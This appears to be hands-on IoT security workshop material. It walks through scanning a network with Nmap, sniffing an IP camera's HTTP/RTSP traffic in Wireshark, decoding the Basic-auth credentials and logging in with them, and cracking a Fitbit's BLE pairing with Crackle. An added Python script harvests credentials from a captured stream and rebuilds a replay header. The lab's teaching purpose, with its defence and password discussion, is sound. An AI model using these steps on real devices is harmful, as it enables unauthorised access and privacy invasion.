• Use Nmap to do a quick scan on the network: nmap -T4 -F 192.168.0.0/24 (-F scans the 100 most common ports; -T4 uses faster timing)
• Identify the target MAC address: B0:C5:54:xx:xx:xx (nmap only shows MAC addresses when run as root against hosts on the local segment)
• Take note of the ports and services as well
Sample Nmap quick scan output
What is RTSP?
• Real Time Streaming Protocol (RTSP), usually on TCP port 554
• Network control protocol designed for use in entertainment and communications systems to control streaming media servers
• The protocol is used for establishing and controlling media sessions between end points (DESCRIBE, SETUP, PLAY); the video itself is typically carried separately by RTP.
Step 2 – Sniffing traffic using Wireshark
• Use Wireshark to sniff traffic, and filter it on the camera’s IP address: ip.addr == 192.168.0.xxx
• Get useful information from the traffic. Hint: remember the Nmap ports and services? Right-click a packet on one of them and choose Follow > TCP Stream.
Sample Wireshark capture
Step 3 – Understanding the HTTP stream
• In the stream, you should notice a header called “Authorization: Basic ……”
• HTTP Basic authentication (BA) is the simplest technique for enforcing access controls to web resources because it doesn't require cookies, session identifiers, or login pages; it uses standard fields in the HTTP header, obviating the need for handshakes.
• The string after “Basic” is the username and password joined by a colon and Base64-encoded. Base64 is an encoding, not encryption: anyone who sniffs the plaintext HTTP traffic decodes it instantly.
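The following added example (mine, not part of the workshop material) does what you do by hand in Wireshark's Follow TCP Stream window: it splits a reassembled client stream into requests, pulls out every `Authorization: Basic` header, decodes it, and rebuilds the header an attacker would replay. RTSP reuses HTTP's request-line and header syntax, so the same parser covers both the web UI and the stream on port 554. The stream text, addresses and credentials in `STREAM` are constructed.

```python
import base64
import re

# Constructed "Follow TCP Stream" text for a camera login, not a real capture.
STREAM = (
    "GET /cgi-bin/snapshot.cgi HTTP/1.1\r\n"
    "Host: 192.168.0.123\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
    "HTTP/1.1 401 Unauthorized\r\n"
    "WWW-Authenticate: Basic realm=\"IPCam\"\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "GET /cgi-bin/snapshot.cgi HTTP/1.1\r\n"
    "Host: 192.168.0.123\r\n"
    "Authorization: Basic YWRtaW46MTIzNDU2\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
    "DESCRIBE rtsp://192.168.0.123:554/live RTSP/1.0\r\n"
    "CSeq: 2\r\n"
    "Authorization: Basic YWRtaW46MTIzNDU2\r\n"
    "\r\n"
)

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) ((?:HTTP|RTSP)/\d\.\d)$")


def parse_requests(stream):
    """Split a reassembled stream into client requests. HTTP and RTSP share the request-line
    and header syntax, so one parser covers both ports seen in the Nmap scan.
    Server responses (blocks starting with HTTP/ or RTSP/) do not match and are skipped."""
    requests = []
    for block in stream.split("\r\n\r\n"):
        lines = block.split("\r\n")
        m = REQUEST_LINE.match(lines[0])
        if not m:
            continue
        headers = {}
        for line in lines[1:]:
            if ":" in line:
                name, value = line.split(":", 1)
                headers[name.strip().lower()] = value.strip()
        requests.append({"method": m.group(1), "target": m.group(2),
                         "proto": m.group(3), "headers": headers})
    return requests


def basic_credentials(request):
    """Decode 'Authorization: Basic <base64(user:password)>'. Base64 is reversible by
    anyone; it only keeps the colon-separated pair ASCII-safe."""
    scheme, _, token = request["headers"].get("authorization", "").partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        user, _, password = base64.b64decode(token, validate=True).decode("utf-8").partition(":")
    except (ValueError, UnicodeDecodeError):
        return None
    return user, password


def harvest(stream):
    """Every (protocol, target, user, password) exposed in the stream, as a sniffer sees it."""
    found = []
    for req in parse_requests(stream):
        creds = basic_credentials(req)
        if creds:
            found.append((req["proto"], req["target"]) + creds)
    return found


def basic_header(user, password):
    """Rebuild the header: all a replaying attacker needs to log in to the camera's web UI."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Authorization: Basic {token}"


if __name__ == "__main__":
    for proto, target, user, password in harvest(STREAM):
        print(f"{proto} {target}: {user} / {password}")
    print(basic_header("admin", "123456"))
```

The first request in the stream carries no credentials and gets a 401 with `WWW-Authenticate: Basic`; the browser then resends with the header, which is the moment the password leaks. The defence is not a stronger encoding but TLS (HTTPS/RTSPS) so the header is never visible on the wire.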
Step 4 – Accessing camera’s settings
• Input the IP address into a web browser. Example: 192.168.0.xxx
• This should prompt a login popup
• Verify the success of the prior steps by keying in the decoded login details
Step 5 – Figuring out what else we can do
• Remember the results of the Nmap scan?
• What other protocols or services are there (e.g. RTSP on port 554)?
Discussion
• Defence techniques?
• How can one mitigate the attacks we just performed?
Password Guidelines
• The longer the password, the harder it is to crack
• Always use a combination of letters, numbers and special characters
• Use a different password for every account
• What to avoid while selecting your password:
  • dictionary words
  • easy-to-guess names and numbers
  • sequences or repeated characters
  • anything on the worst-password lists (password, 123456, 111111, iloveyou, etc.)
• Question: longer or more complex, which is better? Each extra character multiplies the search space by the alphabet size, whereas forcing a symbol into a short password adds only a few bits, so length wins, provided the password is not a dictionary phrase.
Fitbit
• Used an unencrypted communication channel
• Synchronizes automatically with the mobile device over BLE
• So what does all this translate to for an attacker?
Fitbit exercise
• Convert the fitbit.psd capture (Texas Instruments BLE sniffer format) to a pcap using tibtle2pcap.py
• Downloadable from https://github.com/joswr1ght/tibtle2pcap
• python tibtle2pcap.py fitbit.psd output.pcap
• wireshark output.pcap
Crackle – Tool for cracking BLE pairing keys
• Cracks the BLE Legacy pairing key exchange
• Exploits a weakness in the pairing mechanism: the Temporary Key (TK) is 0 for “Just Works” pairing or a 6-digit passkey, so it has at most a million possible values
• Brute-forces the TK from the sniffed pairing confirm values and derives all further keys (the STK)
• Can even obtain the LTK exchanged under the STK
• Decrypts the entire communication
Discussion
• Privacy issues?
• How can an activity tracker be better designed?
Conclusion
• Thoughts on IoT
• Security and privacy concerns brought by IoT
• Next-gen malware